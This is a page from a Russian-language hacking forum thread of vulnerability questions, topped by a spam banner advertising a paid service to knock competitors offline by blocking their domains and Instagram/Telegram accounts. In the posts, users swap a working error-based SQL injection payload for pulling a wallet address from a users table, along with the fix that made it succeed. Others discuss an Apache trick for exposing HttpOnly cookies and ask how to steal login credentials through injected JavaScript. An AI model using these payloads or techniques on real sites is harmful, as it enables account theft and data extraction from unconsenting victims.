УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 38 из 296

« Первая

138

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#371

23.07.2015, 14:45

nik1201

Guest

Сообщений: n/a

Провел на форуме:
13708

Репутация: 0

Почему вчера я мог заменить куки а сегодня почему то не получается?

#372

23.07.2015, 15:00

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от nik1201

nik1201 said:
↑
А обойти можно httponly?

Есть такая узявимость как HTTP Only Cookie Disclosure. Я её ещё называю Cookie Bomb.

Работает так:

1) Необходимо установить специальную cookie, название которой располагается ниже cookie, которую необходимо скомпрометировать, при условии упорядочивания их в алфавитном порядке.

2) Специальная cookie должна состоять из более чем 10000 символов для вызова уязвимости в версии Apache

#373

23.07.2015, 15:01

frank

Guest

Сообщений: n/a

Провел на форуме:
56887

Репутация: 28

Цитата:

Сообщение от yarbabin

yarbabin said:
↑
на некоторых версиях apache можно:
http://www.securityfocus.com/bid/51706/exploit

А Ajax и метод XMLHTTPResponse не работают?

#374

23.07.2015, 15:07

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от frank

frank said:
↑
А Ajax и метод XMLHTTPResponse не работают?

почему бы им не работать?

#375

23.07.2015, 15:08

frank

Guest

Сообщений: n/a

Провел на форуме:
56887

Репутация: 28

Цитата:

Сообщение от yarbabin

yarbabin said:
↑
почему бы им не работать?

Это бы как бы вопрос-уточнение . Спасибо.

#376

25.07.2015, 15:41

madam

Guest

Сообщений: n/a

Провел на форуме:
50513

Репутация: 1

делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

но в ответ получаю

Subquery returns more than 1 row

как вытащить wallet_address (34 символа)?

спасибо

#377

25.07.2015, 16:08

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от madam

madam said:
↑
делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
но в ответ получаю
Subquery returns more than 1 row
как вытащить wallet_address (34 символа)?
спасибо

выводите через extractvalue() или попробуйте обернуть колонку в group_concat()

#378

25.07.2015, 16:27

madam

Guest

Сообщений: n/a

Провел на форуме:
50513

Репутация: 1

спасибо group_concat() помогло

#379

26.07.2015, 16:20

nik1201

Guest

Сообщений: n/a

Провел на форуме:
13708

Репутация: 0

Есть сайт такого типа

Форма логина такая -

----------------------------------------------------------------------------------------------------------------

Форма пароля такая -

----------------------------------------------------------------------------------------------------------------

Можно ли удаленным js воровать логи и пароли из этих форм ?кража кук не подходит т.к httponly не обходится.((Или что еще можно придумать?Заранее спс

Картинка была нарисована в paint ,просто порисовать захотелось)))